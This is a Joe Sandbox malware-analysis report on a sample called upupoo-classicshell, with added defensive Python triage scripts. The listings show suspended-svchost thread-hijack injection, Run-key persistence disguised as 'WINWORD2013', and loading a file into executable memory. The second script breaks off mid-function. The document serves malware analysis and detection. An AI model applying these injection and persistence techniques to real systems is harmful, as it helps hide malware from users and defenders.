• Associated: 00000003.00000002.2357958732.000000006E0CC000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_6e090000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AddressProc$HandleModuleXinvalid_argumentstd::_
                                                                                                              • String ID: AcquireSRWLockExclusive$CloseThreadpoolTimer$CloseThreadpoolWait$CloseThreadpoolWork$CompareStringEx$CreateEventExW$CreateSemaphoreExW$CreateSemaphoreW$CreateSymbolicLinkW$CreateThreadpoolTimer$CreateThreadpoolWait$CreateThreadpoolWork$FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$FlushProcessWriteBuffers$FreeLibraryWhenCallbackReturns$GetCurrentPackageId$GetCurrentProcessorNumber$GetFileInformationByHandleEx$GetLocaleInfoEx$GetSystemTimePreciseAsFileTime$GetTickCount64$InitOnceExecuteOnce$InitializeConditionVariable$InitializeCriticalSectionEx$InitializeSRWLock$LCMapStringEx$ReleaseSRWLockExclusive$SetFileInformationByHandle$SetThreadpoolTimer$SetThreadpoolWait$SleepConditionVariableCS$SleepConditionVariableSRW$SubmitThreadpoolWork$TryAcquireSRWLockExclusive$WaitForThreadpoolTimerCallbacks$WakeAllConditionVariable$WakeConditionVariable$invalid random_device value$kernel32.dll
                                                                                                              • API String ID: 2259925219-2420364413
                                                                                                              • Opcode ID: 1f353f6b2f3d93471452ddd0dd91daf40301053ab154346b8aac203eb3f02b63
                                                                                                              • Instruction ID: 3aa6410400ac3f02b8326eb916f20d0734eefa6724fe69c96ca409f03710f30e
                                                                                                              • Opcode Fuzzy Hash: 1f353f6b2f3d93471452ddd0dd91daf40301053ab154346b8aac203eb3f02b63
                                                                                                              • Instruction Fuzzy Hash: DA911D71821A15EBCF20AFF4C8DCAA67BE8FF0F6053855416F219DA244D7BAA1118F64

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              • Wow64GetThreadContext.KERNEL32(?,00010007,?,?,?), ref: 10002E0A
                                                                                                              • VirtualAllocEx.KERNELBASE(?,00000000,0000098B,00003000,00000040,?,?,?,?), ref: 10002E34
                                                                                                              • WriteProcessMemory.KERNELBASE(?,00000000,?,0000098B,?,?,?,?), ref: 10002E51
                                                                                                              • Wow64SetThreadContext.KERNEL32(?,00010007,?,?,?), ref: 10002E69
                                                                                                              • VirtualFreeEx.KERNEL32(?,00000000,00000000,00008000,?,?,?), ref: 10002E7C
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357704492.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000003.00000002.2357679875.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.2357728589.000000001000F000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.2357751768.0000000010016000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.2357775198.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_10000000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ContextThreadVirtualWow64$AllocFreeMemoryProcessWrite
                                                                                                              • String ID:
                                                                                                              • API String ID: 3959752867-0
                                                                                                              • Opcode ID: 2aa5b0fbbeca8468b766af85c47c793cb346d04a068a50436ebb2147043037f6
                                                                                                              • Instruction ID: 28f3b55be30508669fb9009672a420b800c3ec54d15fb3acdede59701e9519d4
                                                                                                              • Opcode Fuzzy Hash: 2aa5b0fbbeca8468b766af85c47c793cb346d04a068a50436ebb2147043037f6
                                                                                                              • Instruction Fuzzy Hash: 8E21C835B40218ABF720DB65DC89FEF77ECEB49690F1040AAF909E6181DA709E449B90

                                                                                                              Control-flow Graph

Control-flow graph image (executed / not executed colouring) not captured in this export. Recoverable structure from the graph data: function 10001270-10002bf7 (call 1000db40 on entry); the block 10002a72-10002ac1 calls 100035b0 and 10002c90 (the CreateProcessA svchost.exe routine, whose CloseHandle calls return to 10002ABF); the block 10002ac7-10002b87 calls 10002c00 (the Run-key routine, returning to 10002ACC), 10002f00 three times, 10003660 and 10003b27; a loop at 10002b90-10002bca calls GetFileAttributesW (10002b9c) and, on one outcome, SetFileAttributesW (10002bc1); 10002bcc-10002bd2 calls 10002f60 and all paths leave through 10002bd7-10002bf7 (call 10003ae3).
                                                                                                              APIs
                                                                                                              • GetFileAttributesW.KERNELBASE(00000000,?,00000018,00000003,10002EC0,?,?,?,C:\Users\Public\Documents\upup.ox,C:\Users\Public\Documents\ClassicStartMenuDLL.dll,C:\Users\Public\Documents\upupoo-classicshell.exe), ref: 10002B9D
                                                                                                              • SetFileAttributesW.KERNELBASE(00000000,00000000), ref: 10002BC3
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357704492.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000003.00000002.2357679875.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.2357728589.000000001000F000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.2357751768.0000000010016000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.2357775198.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_10000000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AttributesFile
                                                                                                              • String ID: Y$a$Ya$Z:$_Y$c$c$9$9$9$cc$ca$}}$$I/$'0$'8$'9$'9$'=$'>$'>$'?$-u1Q$0)$0:$0'88$11$13$13$1<$1u$1ak=$38$38$38$3:$3a$3e$3e$3k$3m$3s$8'$8'$83$83$83$88$8?'8$93$93$93$93$:;$:f$:}$:0'8$;'$;'$;3$;8$;9$;f$;y$;}$;'mo$<8$<1=$=3$=>';$>=$>';:$?8$??$??$?'8<$C:\Users\Public\Documents\ClassicStartMenuDLL.dll$C:\Users\Public\Documents\upup.ox$C:\Users\Public\Documents\upupoo-classicshell.exe$I-$Ia9$Ia9$JQcm$M-1$M-Ma$M-aa$U--}$U--}$Uyt$X__Y$Y"$az$a=/[$bu$dh{b$ee$ej$fu$jfml$ku$ku$mk$mu$mu$ou$sk$tWq$u1$u1$u8$u8$u8$u9$u9$u9$u9$u9$u:$ucI_$yc$yu$yu$}u$}meo$!_c$f
                                                                                                              • API String ID: 3188754299-3950023959
                                                                                                              • Opcode ID: cedff1b7464d14d8e85796f7a096d0861772e959dedb2aa505a10ea431317878
                                                                                                              • Instruction ID: da75c45dda52581703278f533a2ab6672e5d46496c56aec32b46b385a787f13b
                                                                                                              • Opcode Fuzzy Hash: cedff1b7464d14d8e85796f7a096d0861772e959dedb2aa505a10ea431317878
                                                                                                              • Instruction Fuzzy Hash: DEC2BBB0846769CFEB60CF469D4839EBAB1FB11348F6081C9C59C3A215DB751ACACF85

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              • LoadLibraryW.KERNEL32 ref: 6E0A795C
                                                                                                              • LoadLibraryW.KERNEL32(?), ref: 6E0A7965
                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 6E0A798B
                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 6E0A799A
                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 6E0A79A4
                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 6E0A7AB1
                                                                                                                • Part of subcall function 6E0A77F9: __Thrd_sleep.LIBCPMT ref: 6E0A7825
                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 6E0A7A9F
                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 6E0A7AA2
                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 6E0A7AB6
                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 6E0A7ABD
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357826488.000000006E091000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6E090000, based on PE: true
• Associated: 00000003.00000002.2357800390.000000006E090000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000003.00000002.2357861866.000000006E0BB000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000003.00000002.2357887722.000000006E0C5000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000003.00000002.2357910342.000000006E0C6000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000003.00000002.2357935659.000000006E0C8000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000003.00000002.2357958732.000000006E0CC000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_6e090000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Library$Free$AddressProc$Load$Thrd_sleep
                                                                                                              • String ID: Coun$F$G$kCou$ncy$nt64$qu$t$tTic
                                                                                                              • API String ID: 1212583105-1930867906
                                                                                                              • Opcode ID: 63fd3fae5bd9e653d44420dd36731c278ce61cb73c82321da499a8b34c628357
                                                                                                              • Instruction ID: 8bf916e747627c549971069d7c37d89a57b269ec6c7abb6ecca18ec26ac9f372
                                                                                                              • Opcode Fuzzy Hash: 63fd3fae5bd9e653d44420dd36731c278ce61cb73c82321da499a8b34c628357
                                                                                                              • Instruction Fuzzy Hash: 27617B3290C7899ED321DFA88850BAFBBE8BFD9340F044E1EF58897256DB719544CB52

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              • CreateProcessA.KERNELBASE(00000000,svchost.exe,00000000,00000000,00000000,08000004,00000000,00000000,00000044,?), ref: 10002CE6
                                                                                                              • CloseHandle.KERNEL32(?,?,?,10002ABF), ref: 10002D6E
                                                                                                              • CloseHandle.KERNEL32(?,?,10002ABF), ref: 10002D71
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357704492.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000003.00000002.2357679875.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.2357728589.000000001000F000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.2357751768.0000000010016000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.2357775198.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_10000000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CloseHandle$CreateProcess
                                                                                                              • String ID: D$svchost.exe
                                                                                                              • API String ID: 2922976086-3151309049
                                                                                                              • Opcode ID: 20bf57721d7f56bd52dd17f86fa56a21d471b69ff6a2ea6a2db4510d28630ad0
                                                                                                              • Instruction ID: c8517a272350b0aa592396a75e8fb69f9c71425d1a18c0db54f5954cd65c6c24
                                                                                                              • Opcode Fuzzy Hash: 20bf57721d7f56bd52dd17f86fa56a21d471b69ff6a2ea6a2db4510d28630ad0
                                                                                                              • Instruction Fuzzy Hash: 4331D435E0415C9BEB10DBA4CC41BEEBBB9EF49390F11009AFA05BB285DA717E45CB90
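The two routines above, the CreateProcessA of a bare "svchost.exe" (no path, no -k argument; flags 08000004 = CREATE_SUSPENDED | CREATE_NO_WINDOW; 00000044 = sizeof(STARTUPINFOA)) and the Wow64GetThreadContext / VirtualAllocEx / WriteProcessMemory / Wow64SetThreadContext sequence (00010007 = CONTEXT_FULL for x86; 0000098B = 2443 bytes; 00003000 = MEM_COMMIT | MEM_RESERVE; 00000040 = PAGE_EXECUTE_READWRITE; 00008000 = MEM_RELEASE), together form a suspended-process thread-hijack injection: the child is created frozen, executable memory is written into it, and the initial thread's context is redirected before any real svchost code runs. The Wow64 variants act on the x86 context of a 32-bit child, consistent with this 32-bit module spawning a 32-bit svchost.exe. The Python below is an added example, not Joe Sandbox or sample code: it decodes those constants, applies the parent / -k-argument / image-path checks that an svchost anomaly rule such as the "Suspect Svchost Activity" hit above relies on to constructed process-creation records, and correlates the alloc-write-setcontext sequence over constructed API-trace records. The parent allowlist, the PID and the benign record are assumptions.

```python
"""Triage helpers for the suspended-svchost injection pattern in this report.
Added example, not code from Joe Sandbox or from the sample; records are constructed
to mirror the arguments the report lists and are not real telemetry."""
from dataclasses import dataclass, field
from typing import Optional

# dwCreationFlags (winbase.h). The report's 08000004 = CREATE_SUSPENDED | CREATE_NO_WINDOW.
CREATION_FLAGS = {
    0x00000001: "DEBUG_PROCESS", 0x00000002: "DEBUG_ONLY_THIS_PROCESS", 0x00000004: "CREATE_SUSPENDED",
    0x00000008: "DETACHED_PROCESS", 0x00000010: "CREATE_NEW_CONSOLE", 0x00000200: "CREATE_NEW_PROCESS_GROUP",
    0x00000400: "CREATE_UNICODE_ENVIRONMENT", 0x00080000: "EXTENDED_STARTUPINFO_PRESENT",
    0x01000000: "CREATE_BREAKAWAY_FROM_JOB", 0x04000000: "CREATE_DEFAULT_ERROR_MODE", 0x08000000: "CREATE_NO_WINDOW",
}
# VirtualAllocEx/VirtualFreeEx types and page protections (winnt.h): 00003000, 00000040, 00008000 in the report.
ALLOC_TYPES = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE", 0x4000: "MEM_DECOMMIT", 0x8000: "MEM_RELEASE"}
PAGE_PROTECT = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE", 0x08: "PAGE_WRITECOPY",
                0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE",
                0x80: "PAGE_EXECUTE_WRITECOPY"}
EXECUTABLE_PAGES = {0x10, 0x20, 0x40, 0x80}


def decode_flags(value: int, table: dict) -> list:
    """Expand a bitmask into names, lowest bit first; bits not in the table are kept as hex."""
    names = [name for bit, name in sorted(table.items()) if value & bit]
    leftover = value
    for bit in table:
        leftover &= ~bit
    if leftover:
        names.append(hex(leftover))
    return names


@dataclass
class ProcessCreate:
    image: str                            # resolved path of the new process
    command_line: str
    parent_image: str
    creation_flags: Optional[int] = None  # API-trace/sandbox logs carry this; EDR process events usually do not


# Legitimate svchost.exe parents. Assumption: minimal allowlist, extend for your environment.
SVCHOST_PARENTS = {"c:\\windows\\system32\\services.exe", "c:\\windows\\system32\\msmpeng.exe"}
SVCHOST_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")


def svchost_indicators(ev: ProcessCreate) -> list:
    """Reasons an svchost.exe start looks like an injection host; [] means nothing odd."""
    image = ev.image.lower()
    if not image.endswith("\\svchost.exe"):
        return []
    reasons = []
    if ev.parent_image.lower() not in SVCHOST_PARENTS:
        reasons.append(f"parent is {ev.parent_image}, not services.exe")
    if not image.startswith(SVCHOST_DIRS):
        reasons.append(f"image outside System32/SysWOW64: {ev.image}")
    if " -k " not in f" {ev.command_line.lower()} ":  # real service hosts are always started with -k <group>
        reasons.append("no -k <servicegroup> argument")
    if ev.creation_flags is not None and ev.creation_flags & 0x00000004:
        reasons.append("created suspended: " + "|".join(decode_flags(ev.creation_flags, CREATION_FLAGS)))
    return reasons


@dataclass
class ApiCall:
    api: str
    target: str                          # process acted on (handle resolved to a PID by the tracer)
    args: dict = field(default_factory=dict)


def injection_sequence(calls: list) -> Optional[str]:
    """Executable remote allocation, then a write into that process, then a thread-context
    overwrite, in order against one target. Returns that target, or None."""
    stage = {}                           # target -> last stage reached
    for c in calls:
        if c.api == "VirtualAllocEx" and c.args.get("protect", 0) in EXECUTABLE_PAGES:
            stage[c.target] = 1
        elif c.api == "WriteProcessMemory" and stage.get(c.target) == 1:
            stage[c.target] = 2
        elif c.api in ("SetThreadContext", "Wow64SetThreadContext") and stage.get(c.target) == 2:
            return c.target
    return None


# Constructed records. The first event and the API calls mirror the report (bare "svchost.exe"
# command line, flags 08000004, 0x98B bytes at 00003000/00000040); the PID and the benign event are made up.
SAMPLE_EVENTS = [
    ProcessCreate("C:\\Windows\\SysWOW64\\svchost.exe", "svchost.exe",
                  "C:\\Users\\Public\\Documents\\upupoo-classicshell.exe", 0x08000004),
    ProcessCreate("C:\\Windows\\System32\\svchost.exe", "C:\\Windows\\system32\\svchost.exe -k netsvcs -p",
                  "C:\\Windows\\System32\\services.exe"),
]
SAMPLE_CALLS = [
    ApiCall("Wow64GetThreadContext", "pid:5472", {"context_flags": 0x10007}),
    ApiCall("VirtualAllocEx", "pid:5472", {"size": 0x98B, "type": 0x3000, "protect": 0x40}),
    ApiCall("WriteProcessMemory", "pid:5472", {"size": 0x98B}),
    ApiCall("Wow64SetThreadContext", "pid:5472", {"context_flags": 0x10007}),
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(ev.command_line, "->", svchost_indicators(ev) or "nothing odd")
    print("injection sequence against:", injection_sequence(SAMPLE_CALLS))
```

The sequence correlator deliberately keys on the target process rather than on the calling thread, because the thread-context calls take a thread handle while the memory calls take a process handle; a tracer that resolves both to the child's PID (as sandbox API logs do) is what makes the three stages line up.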

                                                                                                              Control-flow Graph

Control-flow graph image (executed / not executed colouring) not captured in this export. Recoverable structure from the graph data: function 6e0a7ada-6e0a7cd3; four guard checks (6e0a7b04-6e0a7b32, each bailing out to 6e0a7cbb) precede GetModuleFileNameW (6e0a7b38-6e0a7c24, after call 6e0ad10c), then PathRemoveFileSpecW and PathAppendW (6e0a7c2a-6e0a7c5c) and PathFileExistsW (6e0a7c5e-6e0a7c6b); depending on that result the routine either returns via 6e0a7c6d-6e0a7c70 or appends a second component (6e0a7c72-6e0a7c9c) and calls MoveFileExW (6e0a7c9e-6e0a7cb9); all paths leave through 6e0a7cbd-6e0a7cd3 (call 6e0a8161).
                                                                                                              APIs
                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000070,0000002E,00000061), ref: 6E0A7C1A
                                                                                                              • PathRemoveFileSpecW.SHLWAPI(?), ref: 6E0A7C32
                                                                                                              • PathAppendW.SHLWAPI(?,?), ref: 6E0A7C54
                                                                                                              • PathFileExistsW.KERNELBASE(?), ref: 6E0A7C63
                                                                                                              • PathAppendW.SHLWAPI(?,?), ref: 6E0A7C94
                                                                                                              • MoveFileExW.KERNELBASE(?,?,00000001), ref: 6E0A7CAD
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357826488.000000006E091000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6E090000, based on PE: true
• Associated: 00000003.00000002.2357800390.000000006E090000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000003.00000002.2357861866.000000006E0BB000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000003.00000002.2357887722.000000006E0C5000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000003.00000002.2357910342.000000006E0C6000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000003.00000002.2357935659.000000006E0C8000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000003.00000002.2357958732.000000006E0CC000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_6e090000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FilePath$Append$ExistsModuleMoveNameRemoveSpec
                                                                                                              • String ID: ep.a
                                                                                                              • API String ID: 4096670196-1224730783
                                                                                                              • Opcode ID: d993c69f063474623c0636a28cd372e91c0e17715b5de65eee49d7d80b88355e
                                                                                                              • Instruction ID: 3fe620d773dcbd810c6f5253808f6a061a44b6608a579be187340d6df69b0df1
                                                                                                              • Opcode Fuzzy Hash: d993c69f063474623c0636a28cd372e91c0e17715b5de65eee49d7d80b88355e
                                                                                                              • Instruction Fuzzy Hash: E0517A71218388AAE760CBE4D859B6B73E8EFC5B04F401C1EF688C7190E7719544CBAB

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              • RegOpenKeyExW.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\Run,00000000,0002001F,?,?,10002ACC), ref: 10002C25
                                                                                                              • lstrlenW.KERNEL32(C:\Users\Public\Documents\upupoo-classicshell.exe,?,?,10002ACC), ref: 10002C45
                                                                                                              • RegSetValueExW.KERNELBASE(?,WINWORD2013,00000000,00000001,C:\Users\Public\Documents\upupoo-classicshell.exe,00000000,?,10002ACC), ref: 10002C64
                                                                                                              • RegCloseKey.ADVAPI32(?,?,10002ACC), ref: 10002C6F
                                                                                                              Strings
                                                                                                              • WINWORD2013, xrefs: 10002C5C
                                                                                                              • Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 10002C1B
                                                                                                              • C:\Users\Public\Documents\upupoo-classicshell.exe, xrefs: 10002C40, 10002C53
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357704492.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000003.00000002.2357679875.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.2357728589.000000001000F000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.2357751768.0000000010016000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.2357775198.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_10000000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CloseOpenValuelstrlen
                                                                                                              • String ID: C:\Users\Public\Documents\upupoo-classicshell.exe$Software\Microsoft\Windows\CurrentVersion\Run$WINWORD2013
                                                                                                              • API String ID: 2964171075-666963474
                                                                                                              • Opcode ID: 0c43809fd7189bcefc8dca3fb5e0da6ec7fa81206c9ea5fc4cc5c25663f93a58
                                                                                                              • Instruction ID: 66d39b2655ccf81f02d0d063079da501b9c44719882083e2d4544529ef3bc2af
                                                                                                              • Opcode Fuzzy Hash: 0c43809fd7189bcefc8dca3fb5e0da6ec7fa81206c9ea5fc4cc5c25663f93a58
                                                                                                              • Instruction Fuzzy Hash: 2F018635B0012CBBEF10DBB49D45FAE7BA8EB08781F018169FA06EA196DF319954D790

Control-flow Graph (basic-block ranges and edges; the rendered graph is not reproduced here):
control_flow_graph 362 6e0a7526-6e0a763c call 6e0a81cc CreateFileW 365 6e0a770c-6e0a770e 362->365 366 6e0a7642-6e0a764e GetFileSize 362->366 367 6e0a771c 365->367 368 6e0a7710-6e0a7713 365->368 366->365 369 6e0a7654-6e0a7671 VirtualAlloc 366->369 372 6e0a771e-6e0a7723 call 6e0a8187 367->372 368->367 370 6e0a7715-6e0a7716 CloseHandle 368->370 369->365 371 6e0a7677-6e0a7688 ReadFile 369->371 370->367 373 6e0a768a-6e0a76e0 call 6e0a7467 call 6e091000 371->373 374 6e0a7700-6e0a7707 call 6e0a73ce 371->374 373->374 382 6e0a76e2-6e0a76f0 call 6e0a73ce 373->382 374->365 382->372 385 6e0a76f2-6e0a76f5 382->385 385->372 386 6e0a76f7-6e0a76fe CloseHandle 385->386 386->372
                                                                                                              APIs
                                                                                                              • __EH_prolog3_GS.LIBCMT ref: 6E0A752D
                                                                                                              • CreateFileW.KERNELBASE(-00000017,80000000,00000001,00000000,00000003,00000080,00000000,0000007C,6E0A74CF,6E0A8143), ref: 6E0A7624
                                                                                                              • GetFileSize.KERNEL32(00000000,00000000), ref: 6E0A7644
                                                                                                              • VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000040), ref: 6E0A765D
                                                                                                              • CloseHandle.KERNELBASE(00000000,00000000,00000000), ref: 6E0A76F8
                                                                                                              • ReadFile.KERNELBASE(00000000,00000000,00000000,-0000001B,00000000), ref: 6E0A7680
                                                                                                                • Part of subcall function 6E0A73CE: VirtualFree.KERNELBASE(00008000,00000000,00008000,6E0A770C), ref: 6E0A73E0
                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 6E0A7716
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357826488.000000006E091000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6E090000, based on PE: true
• Associated: 00000003.00000002.2357800390.000000006E090000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000003.00000002.2357861866.000000006E0BB000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000003.00000002.2357887722.000000006E0C5000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000003.00000002.2357910342.000000006E0C6000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000003.00000002.2357935659.000000006E0C8000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000003.00000002.2357958732.000000006E0CC000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_6e090000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: File$CloseHandleVirtual$AllocCreateFreeH_prolog3_ReadSize
                                                                                                              • String ID:
                                                                                                              • API String ID: 3668218861-0
                                                                                                              • Opcode ID: ae59ba30428751a3a90938d2a44f563a197c2deeb565da6a69e8f53c43fbe915
                                                                                                              • Instruction ID: e7cc01f38a4b5440fd169e164ff17a37abec0dbfc398a0d5b68676d373fef05a
                                                                                                              • Opcode Fuzzy Hash: ae59ba30428751a3a90938d2a44f563a197c2deeb565da6a69e8f53c43fbe915
                                                                                                              • Instruction Fuzzy Hash: DC517C31E50348A9EB20CBE49C55BEEB774FF54B50F20550AEA14FB2E5E3B10941CB5A
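The two routines above carry the analyst-relevant facts of this module: the function at 6E0A7526 opens a file, sizes it, allocates a buffer with VirtualAlloc whose last argument is 00000040 (PAGE_EXECUTE_READWRITE) and reads the file into it, which is the shape of an in-memory loader; the function whose String ID is listed at the top of this section pairs a dropped binary under C:\Users\Public\Documents with the CurrentVersion\Run key and the value name WINWORD2013, which is Run-key persistence. The following script is an added example by the editor, not part of the Joe Sandbox report or of the sample: it parses API lines in the format this report prints, decodes the VirtualAlloc/VirtualFree flags against the Win32 SDK constants, flags the read-file-into-executable-memory pattern, and splits the '$'-joined String ID into path, Run subkey and value name. The sample lines are copied from the listing above and the string from the top of the section; the argument values are whatever the sandbox recorded at the call site (several are zero or stack noise), and the registry hive is not in the string, so the script does not guess it.

```python
import re
from typing import Dict, List, Optional

# Constructed sample input: the "APIs" lines of the routine at 6E0A7526, copied in
# the shape Joe Sandbox prints them (API.Module(args), ref: call-site address).
SAMPLE_API_LINES = [
    "CreateFileW.KERNELBASE(-00000017,80000000,00000001,00000000,00000003,00000080,00000000,0000007C,6E0A74CF,6E0A8143), ref: 6E0A7624",
    "GetFileSize.KERNEL32(00000000,00000000), ref: 6E0A7644",
    "VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000040), ref: 6E0A765D",
    "ReadFile.KERNELBASE(00000000,00000000,00000000,-0000001B,00000000), ref: 6E0A7680",
    "VirtualFree.KERNELBASE(00008000,00000000,00008000,6E0A770C), ref: 6E0A73E0",
    "CloseHandle.KERNEL32(00000000), ref: 6E0A7716",
]

# The "String ID" of the persistence routine at the top of this section.
SAMPLE_STRING_ID = (
    r"C:\Users\Public\Documents\upupoo-classicshell.exe"
    r"$Software\Microsoft\Windows\CurrentVersion\Run$WINWORD2013"
)

# Win32 constants (winnt.h) for the arguments that matter here.
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
MEM_FLAGS = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE",
             0x4000: "MEM_DECOMMIT", 0x8000: "MEM_RELEASE"}
EXECUTABLE_PROTECTS = {0x10, 0x20, 0x40, 0x80}

_LINE_RE = re.compile(
    r"^(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$"
)


def _parse_arg(tok: str) -> Optional[int]:
    """Joe prints each argument as hex digits, with a leading '-' for values it shows
    as negative; '?' marks an argument it could not recover."""
    tok = tok.strip()
    if tok in ("?", ""):
        return None
    neg = tok.startswith("-")
    value = int(tok.lstrip("-"), 16)
    return -value if neg else value


def parse_api_line(line: str) -> Dict:
    """Parse one 'APIs' line into api name, module, argument list and call site."""
    m = _LINE_RE.match(line.strip().lstrip("•").strip())
    if not m:
        raise ValueError(f"not a Joe Sandbox API line: {line!r}")
    return {
        "api": m.group("api"),
        "module": m.group("module"),
        "args": [_parse_arg(a) for a in m.group("args").split(",")],
        "ref": int(m.group("ref"), 16),
    }


def decode_flags(value: Optional[int], table: Dict[int, str]) -> List[str]:
    """Expand a bitmask into names from `table`; bits not in the table stay as hex."""
    if value is None:
        return ["?"]
    names = [name for bit, name in table.items() if value & bit]
    leftover = value & ~sum(table)
    if leftover:
        names.append(hex(leftover))
    return names


def decode_virtualalloc(call: Dict) -> Dict:
    """VirtualAlloc(lpAddress, dwSize, flAllocationType, flProtect)."""
    addr, size, alloc_type, protect = (call["args"] + [None] * 4)[:4]
    return {
        "address": addr,
        "size": size,
        "allocation": decode_flags(alloc_type, MEM_FLAGS),
        "protect": decode_flags(protect, PAGE_PROTECT),
        "executable": protect is not None and bool(protect & sum(EXECUTABLE_PROTECTS)),
    }


def find_rwx_file_load(lines: List[str]) -> List[Dict]:
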